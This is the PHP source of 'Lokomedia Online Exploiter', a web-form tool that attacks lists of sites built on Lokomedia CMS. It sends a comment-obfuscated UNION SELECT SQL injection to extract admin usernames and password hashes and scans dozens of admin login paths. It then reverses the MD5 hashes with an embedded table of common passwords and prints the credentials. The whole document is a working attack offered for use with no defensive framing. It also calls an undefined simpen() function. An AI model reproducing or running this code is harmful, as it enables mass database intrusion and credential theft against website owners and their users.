Lokomedia Online Exploiter

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4.  
5. // Lokomedia (SQL Injection) + Auto Scan Admin Login
6. // enjoyyyy
7.  
8. function cover() {
9. echo "<br>[ SQL LOKOMEDIA AUTO EXPLOIT + SCAN ADMIN LOGIN ]<br>";
10. }
11.  
12. ?>
13. <html>
14. <head>
15. <title>SQL LOKOMEDIA AUTO EXPLOIT + SCAN ADMIN LOGIN</title>
16. <style type="text/css">
17. @import url('https://fonts.googleapis.com/css?family=Open+Sans+Condensed:300');
18. textarea {
19. width: 500px;
20. height: 200px;
21. border: 1px solid #000000;
22. margin: 5px auto;
23. padding: 7px;
24. }
25. input[type=submit] {
26. width: 500px;
27. height: 25px;
28. border: 1px solid #000000;
29. background: transparent;
30. margin: 5px auto;
31. background: #000000;
32. color: #ffffff;
33. cursor: pointer;
34. }
35. body {
36. background:url('https://i.imgur.com/SgW5owy.jpg') center top no-repeat;
37. background-attachment: fixed;
38. background-size:cover;
39. font-family:'Open Sans Condensed', sans-serif;
40. }
41. </style>
42. </head>
43. <center>
44. <?php cover(); ?>
45. <form method="post">
46. <textarea name="target" placeholder="http://www.target.com/" style="width: 500px; height: 250px;" required></textarea><br>
47. <input type="submit" name="go" value="Xploit" style="width: 500px;">
48. </form>
49. </center>
50. <?php
51. function ngcurl($url) {
52. $curl = curl_init($url);
53. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
54. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
55. $content = curl_exec($curl);
56. curl_close($curl);
57. return $content;
58. }
59. $admin = array(
60. 'adm/',
61. '_adm_/',
62. '_admin_/',
63. '_administrator_/',
64. 'operator/',
65. 'sika/',
66. 'develop/',
67. 'ketua/',
68. 'redaktur/',
69. 'author',
70. 'admin/',
71. 'administrator/',
72. 'adminweb/',
73. 'user/',
74. 'users/',
75. 'dinkesadmin/',
76. 'retel/',
77. 'author/',
78. 'panel/',
79. 'paneladmin/',
80. 'panellogin/',
81. 'redaksi/',
82. 'cp-admin/',
83. 'master/',
84. 'master/index.php',
85. 'master/login.php',
86. 'operator/index.php',
87. 'sika/index.php',
88. 'develop/index.php',
89. 'ketua/index.php',
90. 'redaktur/index.php',
91. 'admin/index.php',
92. 'administrator/index.php',
93. 'adminweb/index.php',
94. 'user/index.php',
95. 'users/index.php',
96. 'dinkesadmin/index.php',
97. 'retel/index.php',
98. 'author/index.php',
99. 'panel/index.php',
100. 'paneladmin/index.php',
101. 'panellogin/index.php',
102. 'redaksi/index.php',
103. 'cp-admin/index.php',
104. 'operator/login.php',
105. 'sika/login.php',
106. 'develop/login.php',
107. 'ketua/login.php',
108. 'redaktur/login.php',
109. 'admin/login.php',
110. 'administrator/login.php',
111. 'adminweb/login.php',
112. 'user/login.php',
113. 'users/login.php',
114. 'dinkesadmin/login.php',
115. 'retel/login.php',
116. 'author/login.php',
117. 'panel/login.php',
118. 'paneladmin/login.php',
119. 'panellogin/login.php',
120. 'redaksi/login.php',
121. 'cp-admin/login.php',
122. 'terasadmin/',
123. 'terasadmin/index.php',
124. 'terasadmin/login.php',
125. 'rahasia/',
126. 'rahasia/index.php',
127. 'rahasia/admin.php',
128. 'rahasia/login.php',
129. 'dinkesadmin/',
130. 'dinkesadmin/login.php',
131. 'adminpmb/',
132. 'adminpmb/index.php',
133. 'adminpmb/login.php',
134. 'system/',
135. 'system/index.php',
136. 'system/login.php',
137. 'webadmin/',
138. 'webadmin/index.php',
139. 'webadmin/login.php',
140. 'wpanel/',
141. 'wpanel/index.php',
142. 'wpanel/login.php',
143. 'adminpanel/index.php',
144. 'adminpanel/',
145. 'adminpanel/login.php',
146. 'adminkec/',
147. 'adminkec/index.php',
148. 'adminkec/login.php',
149. 'admindesa/',
150. 'admindesa/index.php',
151. 'admindesa/login.php',
152. 'adminkota/',
153. 'adminkota/index.php',
154. 'adminkota/login.php',
155. 'admin123/',
156. 'admin123/index.php',
157. 'admin123/login.php',
158. 'logout/',
159. 'logout/index.php',
160. 'logout/login.php',
161. 'logout/admin.php',
162. 'adminweb_setting',
163. );
164. $real_pass = array(
165. "a66abb5684c45962d887564f08346e8d" => "admin123456",
166. "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
167. "c630643500720b255abb22e2ab2c31f6" => "sumedang123",
168. "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
169. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
170. "93261ae77f0df5522dd9767203f3aa17" => "house69",
171. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
172. "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
173. "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
174. "fbff29af096fa646757ce8439b644714" => "vro190588",
175. "1feadc10e93f2b64c65868132f1e72d3" => "agoes",
176. "0192023a7bbd73250516f069df18b500" => "admin123",
177. "7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
178. "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
179. "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
180. "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
181. "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
182. "73acd9a5972130b75066c82595a1fae3" => "ADMIN",
183. "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
184. "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
185. "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
186. "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
187. "5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
188. "c21f969b5f03d33d43e04f8f136e7682" => "default",
189. "1a1dc91c907325c69271ddf0c944bc72" => "pass",
190. "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
191. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
192. "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
193. "c893bad68927b457dbed39460e6afd62" => "prueba",
194. "b2ca9cfa6067282a031d28a54886822d" => "admin4343",
195. "3a3795bb61d5377545b4f345ff223e3d" => "bingo",
196. "e172dd95f4feb21412a692e73929961e" => "bismillah",
197. "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
198. "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
199. "098f6bcd4621d373cade4e832627b4f6" => "test",
200. "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
201. "5985609a2dc01098797c94a43e0a1115" => "masarief",
202. "21232f297a57a5a743894a0e4a801fc3" => "admin",
203. "1870a829d9bc69abf500eca6f00241fe" => "wordpress",
204. "126ac9f6149081eb0e97c2e939eaad52" => "blog",
205. "fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
206. "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
207. "91f5167c34c400758115c2a6826ec2e3" => "administrador",
208. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
209. "c93ccd78b2076528346216b3b2f701e6" => "admin1234",
210. "912ec803b2ce49e4a541068d495ab570" => "asdf",
211. "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
212. "e99a18c428cb38d5f260853678922e03" => "abc123",
213. "a152e841783914146e4bcd4f39100686" => "asdfgh",
214. "a384b6463fc216a5f8ecb6670f86456a" => "qwert",
215. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
216. "b59c67bf196a4758191e42f76670ceba" => "1111",
217. "96e79218965eb72c92a549dd5a330112" => "111111",
218. "4297f44b13955235245b2497399d7a93" => "123123",
219. "c33367701511b4f6020ec61ded352059" => "654321",
220. "81dc9bdb52d04dc20036dbd8313ed055" => "1234",
221. "e10adc3949ba59abbe56e057f20f883e" => "123456",
222. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
223. "25d55ad283aa400af464c76d713c07ad" => "12345678",
224. "25f9e794323b453885f5181f1b624d0b" => "123456789",
225. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
226. "befe9f8a14346e3e52c762f333395796" => "qawsed",
227. "76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
228. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
229. "bed128365216c019988915ed3add75fb" => "passw0rd",
230. "21232f297a57a5a743894a0e4a801fc3" => "admin",
231. "e10adc3949ba59abbe56e057f20f883e" => "123456",
232. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
233. "25d55ad283aa400af464c76d713c07ad" => "12345678",
234. "f379eaf3c831b04de153469d1bec345e" => "666666",
235. "96e79218965eb72c92a549dd5a330112" => "111111",
236. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
237. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
238. "6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
239. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
240. "63a9f0ea7bb98050796b649e85481845" => "root",
241. "4297f44b13955235245b2497399d7a93" => "123123",
242. "c8837b23ff8aaa8a2dde915473ce0991" => "123321",
243. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
244. "4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
245. "cc03e747a6afbbcbf8be7668acfebee5" => "test123",
246. "62cc2d8b4bf2d8728120d052163a77df" => "demo123",
247. "32250170a0dca92d53ec9624f336ca24" => "pass123",
248. "46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
249. "200820e3227815ed1756a6b531e7e0d2" => "qwe123",
250. "c33367701511b4f6020ec61ded352059" => "654321",
251. "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
252. "172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
253. "e924e336dcc4126334c852eb8fadd334" => "waskita1234",
254. "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
255. "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
256. "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
257. "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
258. "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
259. "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
260. "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
261. "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
262. "5136850b6c8f3ebc66122188347efda0" => "adminku",
263. "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
264. "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
265. "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
266. "ecb4208ee41389259a632d3a733c2786" => "741908",
267. "827ccb0eea8a706c4c34a16891f84e7b" => "12345",
268. "855be097acdf2fea4e342615a154ca3c" => "tolol",
269. "eeee80342778e7b497d507f89094b10d" => "master10",
270. "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
271. "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
272. "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
273. "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
274. "058fe7f85df1e992ef7bf948f1db7842" => "404J",
275. "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
276. );
277. $sites = explode("\r\n", htmlspecialchars($_POST['target']));
278. if(isset($_POST['go'])) {
279. foreach($sites as $url) {
280. if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
281. $url = "http://$url";
282. } else {
283. $url = $url;
284. }
285. $statis = "";
286. $sisa = "";
287. $login = "";
288. $param_list = array("statis","kategori","berita");
289. $curl = ngcurl($url);
290. $curl = str_replace("'", '"', $curl);
291. foreach($param_list as $param) {
292. preg_match_all("/$param-(.*?)\">/", $curl, $id);
293. foreach($id[1] as $stat) {
294. $pecah = explode("-", $stat);
295. $statis .= $pecah[0];
296. $sisa .= $pecah[1];
297. break;
298. }
299. foreach($admin as $adminweb) {
300. $curl_admin = ngcurl("$url/$adminweb");
301. if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
302. $login .= "$url/$adminweb";
303. break;
304. }
305. }
306. $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
307. preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
308. preg_match("/<li>(.*)<li>/", $up[1], $akun);
309. $data = explode(" ", $akun[1]);
310. echo "[+] URL: $url\n";
311. //echo "[+] param: $param\n";
312. if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
313. if(preg_match("/indoxploit/", $sql)) {
314. //echo "[ Injection Successfully ]\n";
315. if($data[0] == "" || $data[1] == "") {
316. echo "[+] Not Injected Onii-Chan :(\n\n";
317. break;
318. } else {
319. echo "[+] username: ".$data[0]."\n";
320. $passwd = $real_pass[$data[1]];
321. if($passwd == "") {
322. $passwd = $data[1];
323. simpen($data[1]);
324. }
325. echo "[+] password: $passwd\n";
326. }
327. if($login == "") {
328. echo "[+] Login Admin ga ketemu Onii-Chan :(\n\n";
329. } else {
330. echo "[+] Login: $login\n\n";
331. }
332. break;
333. } else {
334. echo "[+] Not Injected Nii-Chan :(\n\n";
335. break;
336. }
337. } else {
338. echo "[+] Not Injected Nii-Chan :(\n\n";
339. break;
340. }
341. }
342. }
343. }
344. ?>